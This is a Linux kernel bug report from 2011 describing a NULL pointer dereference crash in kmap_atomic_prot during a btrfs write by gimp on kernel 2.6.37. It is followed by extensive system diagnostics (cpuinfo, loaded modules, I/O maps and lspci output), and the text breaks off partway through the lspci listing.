    <t>My system crashed with the following output: ___ Jan 6 20:06:22 eser kernel: [19365.562621] BUG: unable to handle kernel NULL pointer dereference at (null) Jan 6 20:06:22 eser kernel: [19365.562675] IP: [&lt;c022989b&gt;] kmap_atomic_prot+0x1b/0x100 Jan 6 20:06:22 eser kernel: [19365.562709] *pde = 00000000 Jan 6 20:06:22 eser kernel: [19365.562726] Oops: 0000 [#1] PREEMPT SMP Jan 6 20:06:22 eser kernel: [19365.562752] last sysfs file: /sys/devices/platform/coretemp.0/temp1_input Jan 6 20:06:22 eser kernel: [19365.562777] Modules linked in: isofs usblp usb_storage uas nls_utf8 udf crc_itu_t fuse ipt_MASQUERADE xt_pkttype xt_TCPMSS xt_tcpudp ipt_LOG xt_limit iptable_nat nf_nat snd_pcm_oss snd_mixer_oss snd_seq snd_seq_device xt_NOTRACK ipt_REJECT xt_state iptable_raw iptable_filter nf_conntrack_netbios_ns nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 ip_tables cpufreq_conservative cpufreq_userspace cpufreq_powersave acpi_cpufreq mperf speedstep_lib ip6_tables x_tables loop arc4 ecb b43 snd_hda_codec_si3054 mac80211 snd_hda_codec_realtek snd_hda_intel r8169 snd_hda_codec cfg80211 sdhci_pci mii snd_hwdep acer_wmi sdhci snd_pcm rfkill iTCO_wdt yenta_socket ssb tifm_7xx1 iTCO_vendor_support sg sr_mod mmc_core snd_timer pcmcia_core tifm_core cdrom pcspkr wmi pcmcia_rsrc psmouse snd i2c_i801 shpchp evdev soundcore battery rng_core ac snd_page_alloc pci_hotplug dm_crypt usbhid hid nouveau ttm drm_kms_helper drm uhci_hcd rtc_cmos ata_piix i2c_algo_bit i2c_core rtc_core cfbcopyarea ehci_hcd usb Jan 6 20:06:22 eser kernel: core video cfbimgblt cfbfillrect rtc_lib output button nls_base dm_snapshot sha512_generic sha256_generic xts cbc aes_i586 aes_generic cfq_iosched blk_cgroup btrfs zlib_deflate libcrc32c reiserfs ahci libahci libata coretemp hwmon fan thermal processor unix [last unloaded: pktcdvd] Jan 6 20:06:22 eser kernel: [19365.563014] Jan 6 20:06:22 eser kernel: [19365.563014] Pid: 15675, comm: gimp-2.6 Not tainted 2.6.37 #1 Myall2 /Aspire 9410 Jan 6 20:06:22 eser kernel: [19365.563014] EIP: 0060:[&lt;c022989b&gt;] EFLAGS: 00010202 CPU: 0 Jan 6 20:06:22 eser kernel: [19365.563014] EIP is at kmap_atomic_prot+0x1b/0x100 Jan 6 20:06:22 eser kernel: [19365.563014] EAX: 00000000 EBX: 00000600 ECX: f3a82000 EDX: 00000163 Jan 6 20:06:23 eser kernel: [19365.563014] ESI: f3a83eac EDI: 00000000 EBP: f3a83db8 ESP: f3a83da8 Jan 6 20:06:23 eser kernel: [19365.563014] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Jan 6 20:06:23 eser kernel: [19365.563014] Process gimp-2.6 (pid: 15675, ti=f3a82000 task=eaf28000 task.ti=f3a82000) Jan 6 20:06:23 eser kernel: [19365.563014] Stack: Jan 6 20:06:23 eser kernel: [19365.563014] f3a83dc0 00000600 f3a83eac 00000000 f3a83dc0 c022998e f3a83dd8 c0299c0c Jan 6 20:06:23 eser kernel: [19365.563014] e0359240 00000600 00001000 00001000 f3a83dfc f828d6da 00000600 00001008 Jan 6 20:06:23 eser kernel: [19365.563014] 00000002 00000000 00000002 00002000 00001608 f3a83ed0 f828e1ff 00001608 Jan 6 20:06:23 eser kernel: [19365.563014] Call Trace: Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;c022998e&gt;] ? __kmap_atomic+0xe/0x10 Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;c0299c0c&gt;] ? iov_iter_copy_from_user_atomic+0x3c/0x90 Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;f828d6da&gt;] ? btrfs_copy_from_user+0x5a/0xb0 [btrfs] Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;f828e1ff&gt;] ? btrfs_file_aio_write+0x52f/0x9c0 [btrfs] Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;c02d0810&gt;] ? __mem_cgroup_commit_charge+0x70/0xe0 Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;c02d672c&gt;] ? do_sync_write+0x9c/0xd0 Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;c02d6b15&gt;] ? rw_verify_area+0x65/0x100 Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;c02d6e7a&gt;] ? vfs_write+0x9a/0x160 Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;c02d8211&gt;] ? fget_light+0x91/0xb0 Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;c02d6690&gt;] ? do_sync_write+0x0/0xd0 Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;c02d714d&gt;] ? sys_write+0x3d/0x70 Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;c0202e18&gt;] ? sysenter_do_call+0x12/0x28 Jan 6 20:06:23 eser kernel: [19365.563014] [&lt;c04e0000&gt;] ? quirk_amd_ide_mode+0x40/0x95 Jan 6 20:06:23 eser kernel: [19365.563014] Code: 8b 15 4c 6a 6b c0 55 89 e5 e8 e2 f8 ff ff 5d c3 55 89 e5 83 ec 10 89 e1 81 e1 00 e0 ff ff 89 5d f4 89 75 f8 89 7d fc 83 41 14 01 &lt;8b&gt; 08 c1 e9 1e 69 d9 40 03 00 00 8d 8b c0 42 64 c0 2b 8b cc 45 Jan 6 20:06:23 eser kernel: [19365.563014] EIP: [&lt;c022989b&gt;] kmap_atomic_prot+0x1b/0x100 SS:ESP 0068:f3a83da8 Jan 6 20:06:23 eser kernel: [19365.563014] CR2: 0000000000000000 Jan 6 20:06:23 eser kernel: [19365.568714] ---[ end trace afc2be06c7d06a71 ]--- Jan 6 20:06:23 eser kernel: [19365.568724] note: gimp-2.6[15675] exited with preempt_count 2 ___ The kernel is an unpatched v2.6.37. I have not seen something like this before. eser:~ # /usr/src/linux/scripts/ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux eser 2.6.37 #1 SMP PREEMPT Wed Jan 5 11:17:04 CET 2011 i686 i686 i386 GNU/Linux Gnu C 4.5 Gnu make 3.81 binutils 11.3 2.20.0.20100122 util-linux 2.17.2 mount support module-init-tools 3.12-pre3 e2fsprogs 1.41.11 reiserfsprogs 3.6.21 pcmciautils 015 PPP 2.4.5 isdn4k-utils 3.13 Linux C Library 2.11.2 Dynamic linker (ldd) 2.11.2 Procps 3.2.8 Net-tools 1.60 Kbd 1.14.1 Sh-utils 7.1 wireless-tools 30 Modules Loaded usblp nls_utf8 isofs fuse ipt_MASQUERADE xt_pkttype xt_TCPMSS xt_tcpudp ipt_LOG xt_limit iptable_nat nf_nat snd_pcm_oss snd_mixer_oss snd_seq snd_seq_device xt_NOTRACK ipt_REJECT xt_state iptable_raw iptable_filter nf_conntrack_netbios_ns nf_conntrack_ipv4 nf_conntrack nf_defrag_ipv4 ip_tables cpufreq_conservative ip6_tables cpufreq_userspace cpufreq_powersave acpi_cpufreq mperf x_tables speedstep_lib loop arc4 ecb b43 snd_hda_codec_si3054 mac80211 snd_hda_codec_realtek cfg80211 sg sr_mod snd_hda_intel iTCO_wdt usb_storage sdhci_pci tifm_7xx1 iTCO_vendor_support snd_hda_codec ssb uas r8169 sdhci tifm_core cdrom snd_hwdep acer_wmi mii snd_pcm rfkill mmc_core yenta_socket snd_timer pcmcia_core psmouse shpchp evdev i2c_i801 ac rng_core battery pcmcia_rsrc snd wmi pcspkr soundcore pci_hotplug snd_page_alloc dm_crypt usbhid hid nouveau ttm drm_kms_helper drm uhci_hcd ata_piix i2c_algo_bit i2c_core ehci_hcd cfbcopyarea rtc_cmos video rtc_core usbcore cfbimgblt rtc_lib cfbfillrect output button nls_base dm_snapshot sha512_generic sha256_generic xts cbc aes_i586 aes_generic cfq_iosched blk_cgroup btrfs zlib_deflate libcrc32c reiserfs ahci libahci libata coretemp hwmon fan thermal processor unix ___ eser:~ # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 14 model name : Genuine Intel(R) CPU T2080 @ 1.73GHz stepping : 12 cpu MHz : 1733.000 cache size : 1024 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx constant_tsc arch_perfmon bts aperfmperf pni monitor est tm2 xtpr pdcm dts bogomips : 3458.34 clflush size : 64 cache_alignment : 64 address sizes : 32 bits physical, 32 bits virtual power management: processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 14 model name : Genuine Intel(R) CPU T2080 @ 1.73GHz stepping : 12 cpu MHz : 1733.000 cache size : 1024 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx constant_tsc arch_perfmon bts aperfmperf pni monitor est tm2 xtpr pdcm dts bogomips : 3458.35 clflush size : 64 cache_alignment : 64 address sizes : 32 bits physical, 32 bits virtual power management: ___ eser:~ # cat /proc/modules usblp 9685 0 - Live 0xfd6d3000 nls_utf8 1005 0 - Live 0xf805e000 isofs 28957 0 - Live 0xf8379000 fuse 59907 19 - Live 0xfb8bd000 ipt_MASQUERADE 1299 2 - Live 0xfb892000 xt_pkttype 772 5 - Live 0xfb882000 xt_TCPMSS 2663 1 - Live 0xfb879000 xt_tcpudp 1871 9 - Live 0xfb86f000 ipt_LOG 6732 12 - Live 0xfb864000 xt_limit 1405 12 - Live 0xfb859000 iptable_nat 3373 1 - Live 0xfb842000 nf_nat 14595 2 ipt_MASQUERADE,iptable_nat, Live 0xfb833000 snd_pcm_oss 32912 0 - Live 0xfb815000 snd_mixer_oss 12451 1 snd_pcm_oss, Live 0xfb7fe000 snd_seq 43135 0 - Live 0xfb7e3000 snd_seq_device 5374 1 snd_seq, Live 0xfb7ca000 xt_NOTRACK 708 2 - Live 0xfb714000 ipt_REJECT 1953 3 - Live 0xfb705000 xt_state 926 13 - Live 0xfb6fb000 iptable_raw 1042 1 - Live 0xfb6ef000 iptable_filter 1214 1 - Live 0xfb6e2000 nf_conntrack_netbios_ns 1210 0 - Live 0xfb6d8000 nf_conntrack_ipv4 5796 16 iptable_nat,nf_nat, Live 0xfb6cd000 nf_conntrack 61410 7 ipt_MASQUERADE,iptable_nat,nf_nat,xt_NOTRACK,xt_state,nf_conntrack_netbios_ns,nf_conntrack_ipv4, Live 0xfb6ad000 nf_defrag_ipv4 1125 1 nf_conntrack_ipv4, Live 0xfb68e000 ip_tables 9787 3 iptable_nat,iptable_raw,iptable_filter, Live 0xfb683000 cpufreq_conservative 8742 0 - Live 0xfb673000 ip6_tables 11219 0 - Live 0xfb663000 cpufreq_userspace 2315 0 - Live 0xfb655000 cpufreq_powersave 774 0 - Live 0xfb64b000 acpi_cpufreq 6755 0 - Live 0xfb641000 mperf 1147 1 acpi_cpufreq, Live 0xfb635000 x_tables 14760 14 ipt_MASQUERADE,xt_pkttype,xt_TCPMSS,xt_tcpudp,ipt_LOG,xt_limit,iptable_nat,xt_NOTRACK,ipt_REJECT,xt_state,iptable_raw,iptable_filter,ip_tables,ip6_tables, Live 0xfb62a000 speedstep_lib 4877 0 - Live 0xfb60c000 loop 14086 0 - Live 0xfb41d000 arc4 1077 2 - Live 0xfb289000 ecb 1603 2 - Live 0xfb280000 b43 157282 0 - Live 0xfb24b000 snd_hda_codec_si3054 3192 1 - Live 0xfb1a6000 mac80211 185594 1 b43, Live 0xfb165000 snd_hda_codec_realtek 245049 1 - Live 0xfb0dd000 cfg80211 132290 2 b43,mac80211, Live 0xfb051000 sg 23767 0 - Live 0xfb035000 sr_mod 11745 0 - Live 0xfb049000 snd_hda_intel 20744 2 - Live 0xfafe4000 iTCO_wdt 9404 0 - Live 0xfaf9f000 usb_storage 38293 0 - Live 0xfaf82000 sdhci_pci 6292 0 - Live 0xfaf61000 tifm_7xx1 3582 0 - Live 0xfaf51000 iTCO_vendor_support 2334 1 iTCO_wdt, Live 0xfaf46000 snd_hda_codec 79842 3 snd_hda_codec_si3054,snd_hda_codec_realtek,snd_hda_intel, Live 0xfaf1c000 ssb 32491 1 b43, Live 0xfaee3000 uas 6631 0 - Live 0xfaef8000 r8169 33060 0 - Live 0xfaec1000 sdhci 15980 1 sdhci_pci, Live 0xfaea8000 tifm_core 5528 1 tifm_7xx1, Live 0xfae97000 cdrom 32582 1 sr_mod, Live 0xfae83000 snd_hwdep 4730 1 snd_hda_codec, Live 0xfae65000 acer_wmi 13306 0 - Live 0xfae69000 mii 4241 1 r8169, Live 0xfae50000 snd_pcm 67878 4 snd_pcm_oss,snd_hda_codec_si3054,snd_hda_intel,snd_hda_codec, Live 0xfae30000 rfkill 14990 2 cfg80211,acer_wmi, Live 0xfae0b000 mmc_core 61652 1 sdhci, Live 0xfade7000 yenta_socket 19736 0 - Live 0xfadc0000 snd_timer 17007 2 snd_seq,snd_pcm, Live 0xfad9b000 pcmcia_core 13261 1 yenta_socket, Live 0xfad86000 psmouse 35208 0 - Live 0xfad28000 shpchp 23358 0 - Live 0xfaccc000 evdev 7389 11 - Live 0xfac84000 i2c_i801 6504 0 - Live 0xfac3a000 ac 2591 0 - Live 0xfac2e000 rng_core 3120 1 b43, Live 0xfac24000 battery 8464 0 - Live 0xfac18000 pcmcia_rsrc 881 1 yenta_socket, Live 0xfac0b000 snd 50680 15 snd_pcm_oss,snd_mixer_oss,snd_seq,snd_seq_device,snd_hda_codec_si3054,snd_hda_codec_realtek,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_pcm,snd_timer, Live 0xfabf1000 wmi 8065 1 acer_wmi, Live 0xfabd4000 pcspkr 1410 0 - Live 0xfabc8000 soundcore 6150 1 snd, Live 0xfabbc000 pci_hotplug 23957 1 shpchp, Live 0xfab7d000 snd_page_alloc 6808 2 snd_hda_intel,snd_pcm, Live 0xfaba5000 dm_crypt 10485 2 - Live 0xf935d000 usbhid 32913 0 - Live 0xf931e000 hid 43574 1 usbhid, Live 0xf9302000 nouveau 501346 2 - Live 0xf880d000 ttm 51728 1 nouveau, Live 0xf875a000 drm_kms_helper 29205 1 nouveau, Live 0xf8735000 drm 149127 4 nouveau,ttm,drm_kms_helper, Live 0xf86f2000 uhci_hcd 19381 0 - Live 0xf86a8000 ata_piix 19167 4 - Live 0xf862d000 i2c_algo_bit 4520 1 nouveau, Live 0xf86b8000 i2c_core 20537 5 i2c_i801,nouveau,drm_kms_helper,drm,i2c_algo_bit, Live 0xf8690000 ehci_hcd 34110 0 - Live 0xf8659000 cfbcopyarea 3037 1 nouveau, Live 0xf867b000 rtc_cmos 8019 0 - Live 0xf866b000 video 11762 1 nouveau, Live 0xf8619000 rtc_core 13965 1 rtc_cmos, Live 0xf85fc000 usbcore 128459 6 usblp,usb_storage,uas,usbhid,uhci_hcd,ehci_hcd, Live 0xf8444000 cfbimgblt 2064 1 nouveau, Live 0xf860a000 rtc_lib 2173 1 rtc_core, Live 0xf84ae000 cfbfillrect 3113 1 nouveau, Live 0xf85d5000 output 1699 1 video, Live 0xf83dc000 button 4634 1 nouveau, Live 0xf83d1000 nls_base 6389 3 nls_utf8,isofs,usbcore, Live 0xf8383000 dm_snapshot 25099 0 - Live 0xf8370000 sha512_generic 7176 0 - Live 0xf835d000 sha256_generic 11147 2 - Live 0xf8350000 xts 1923 1 - Live 0xf8344000 cbc 2189 1 - Live 0xf833a000 aes_i586 7224 4 - Live 0xf832f000 aes_generic 26851 1 aes_i586, Live 0xf831d000 cfq_iosched 22870 3 - Live 0xf8306000 blk_cgroup 13215 2 cfq_iosched, Live 0xf82f0000 btrfs 483671 3 - Live 0xf825f000 zlib_deflate 18985 1 btrfs, Live 0xf81bf000 libcrc32c 767 1 btrfs, Live 0xf81b2000 reiserfs 219786 1 - Live 0xf816e000 ahci 18214 0 - Live 0xf811c000 libahci 18496 1 ahci, Live 0xf8105000 libata 178625 3 ata_piix,ahci,libahci, Live 0xf80bb000 coretemp 4832 0 - Live 0xf8076000 hwmon 1472 1 coretemp, Live 0xf806a000 fan 1971 0 - Live 0xf8056000 thermal 7944 0 - Live 0xf8052000 processor 29878 3 acpi_cpufreq, Live 0xf803c000 unix 21363 816 - Live 0xf8001000 ___ eser:~ # cat /proc/ioports 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-0060 : keyboard 0062-0062 : EC data 0064-0064 : keyboard 0066-0066 : EC cmd 0070-0077 : rtc0 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : 0000:00:1f.2 0170-0177 : ata_piix 01f0-01f7 : 0000:00:1f.2 01f0-01f7 : ata_piix 0376-0376 : 0000:00:1f.2 0376-0376 : ata_piix 03c0-03df : vga+ 03f6-03f6 : 0000:00:1f.2 03f6-03f6 : ata_piix 0680-068f : pnp 00:06 06a0-06af : pnp 00:07 06b0-06ff : pnp 00:07 0800-080f : pnp 00:06 0cf8-0cff : PCI conf1 1000-107f : 0000:00:1f.0 1000-107f : pnp 00:06 1000-1003 : ACPI PM1a_EVT_BLK 1004-1005 : ACPI PM1a_CNT_BLK 1008-100b : ACPI PM_TMR 1010-1015 : ACPI CPU throttle 1020-1020 : ACPI PM2_CNT_BLK 1028-102f : ACPI GPE0_BLK 1180-11bf : 0000:00:1f.0 1180-11bf : pnp 00:06 1200-120f : pnp 00:06 1800-181f : 0000:00:1d.0 1800-181f : uhci_hcd 1820-183f : 0000:00:1d.1 1820-183f : uhci_hcd 1840-185f : 0000:00:1d.2 1840-185f : uhci_hcd 1860-187f : 0000:00:1d.3 1860-187f : uhci_hcd 18b0-18bf : 0000:00:1f.2 18b0-18bf : ata_piix 18c0-18df : 0000:00:1f.3 2000-2fff : PCI Bus 0000:02 2000-20ff : 0000:02:00.0 2000-20ff : r8169 3000-3fff : PCI Bus 0000:03 4000-4fff : PCI Bus 0000:05 5000-5fff : PCI Bus 0000:0a 5000-50ff : PCI CardBus 0000:0b 5400-54ff : PCI CardBus 0000:0b ___ eser:~ # cat /proc/iomem 00000000-0000ffff : reserved 00010000-0009f7ff : System RAM 0009f800-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cefff : Video ROM 000dc000-000fffff : reserved 000f0000-000fffff : System ROM 00100000-3fe8ffff : System RAM 00200000-004ede60 : Kernel code 004ede61-00648527 : Kernel data 006aa000-0072806b : Kernel bss 3fe90000-3fefffff : ACPI Non-volatile Storage 3ff00000-3fffffff : reserved 40000000-43ffffff : PCI Bus 0000:0a 40000000-43ffffff : PCI CardBus 0000:0b 44000000-47ffffff : PCI CardBus 0000:0b c0000000-cfffffff : PCI Bus 0000:01 c0000000-cfffffff : 0000:01:00.0 d0000000-d1ffffff : PCI Bus 0000:02 d0000000-d001ffff : 0000:02:00.0 d2000000-d3ffffff : PCI Bus 0000:03 d4000000-d5ffffff : PCI Bus 0000:05 d6000000-d7ffffff : PCI Bus 0000:02 d6000000-d6000fff : 0000:02:00.0 d6000000-d6000fff : r8169 d8000000-d9ffffff : PCI Bus 0000:03 da000000-dbffffff : PCI Bus 0000:05 da000000-da003fff : 0000:05:00.0 da000000-da003fff : 0000:05:00.0 dc000000-ddffffff : PCI Bus 0000:01 dc000000-dcffffff : 0000:01:00.0 dd000000-ddffffff : 0000:01:00.0 de000000-de0fffff : PCI Bus 0000:0a de000000-de000fff : 0000:0a:06.0 de000000-de000fff : yenta_socket de004000-de004fff : 0000:0a:06.2 de004000-de004fff : tifm_7xx1 de005800-de0058ff : 0000:0a:06.3 de005800-de0058ff : mmc0 de300000-de303fff : 0000:00:1b.0 de300000-de303fff : ICH HD audio de304000-de3043ff : 0000:00:1d.7 de304000-de3043ff : ehci_hcd e0000000-efffffff : PCI MMCONFIG 0000 [bus 00-ff] e0000000-efffffff : reserved e0000000-efffffff : pnp 00:01 fec00000-fec0ffff : reserved fec00000-fec003ff : IOAPIC 0 fec28000-fec283ff : IOAPIC 1 fed00000-fed003ff : HPET 0 fed00000-fed003ff : reserved fed00000-fed003ff : pnp 00:04 fed14000-fed19fff : reserved fed14000-fed17fff : pnp 00:01 fed18000-fed18fff : pnp 00:01 fed19000-fed19fff : pnp 00:01 fed1c000-fed8ffff : reserved fed1c000-fed1ffff : pnp 00:01 fed20000-fed3ffff : pnp 00:01 fed40000-fed44fff : pnp 00:01 fed45000-fed8ffff : pnp 00:01 fee00000-fee00fff : Local APIC fee00000-fee00fff : reserved ff000000-ffffffff : reserved ___ eser:~ # lspci -vvv 00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS, 943/940GML and 945GT Express Memory Controller Hub (rev 03) Subsystem: Acer Incorporated [ALI] Device 0107 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [e0] Vendor Specific Information: Len=09 &lt;?&gt; 00:01.0 PCI bridge: Intel Corporation Mobile 945GM/PM/GMS, 943/940GML and 945GT Express PCI Express Root Port (rev 03) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: dc000000-ddffffff Prefetchable memory behind bridge: 00000000c0000000-00000000cfffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [88] Subsystem: Acer Incorporated [ALI] Device 0107 Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [90] MSI: Enable- Count=1/1 Maskable- 64bit- Address: 00000000 Data: 0000 Capabilities: [a0] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #2, Speed 2.5GT/s, Width x16, ASPM L0s L1, Latency L0 &lt;256ns, L1 &lt;4us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x16, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #1, PowerLimit 75.000W; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Off, PwrInd On, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed+ WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Capabilities: [140 v1] Root Complex Link Desc: PortNumber=02 ComponentID=01 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=01 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed19000 00:1b.0 Audio device: Intel Corporation N10/ICH 7 Family High Definition Audio Controller (rev 02) Subsystem: Acer Incorporated [ALI] Device 0107 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 297 Region 0: Memory at de300000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [60] MSI: Enable+ Count=1/1 Maskable- 64bit+ Address: 00000000fee0300c Data: 4171 Capabilities: [70] Express (v1) Root Complex Integrated Endpoint, MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #0, Speed unknown, Width x0, ASPM unknown, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep- BwNot- LnkCtl: ASPM Disabled; Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed unknown, Width x0, TrErr- Train- SlotClk- DLActive- BWMgmt- ABWMgmt- Capabilities: [100 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- VC1: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed- WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=1 ArbSelect=Fixed TC/VC=80 Status: NegoPending- InProgress- Capabilities: [130 v1] Root Complex Link Desc: PortNumber=0f ComponentID=02 EltType=Config Link0: Desc: TargetPort=00 TargetComponent=02 AssocRCRB- LinkType=MemMapped LinkValid+ Addr: 00000000fed1c000 Kernel driver in use: HDA Intel 00:1c.0 PCI bridge: Intel Corporation N10/ICH 7 Family PCI Express Port 1 (rev 02) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 00002000-00002fff Memory behind bridge: d6000000-d7ffffff Prefetchable memory behind bridge: 00000000d0000000-00000000d1ffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s unlimited, L1 unlimited ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop- MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend- LnkCap: Port #1, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;256ns, L1 &lt;4us ClockPM- Surprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt- ABWMgmt- SltCap: AttnBtn- 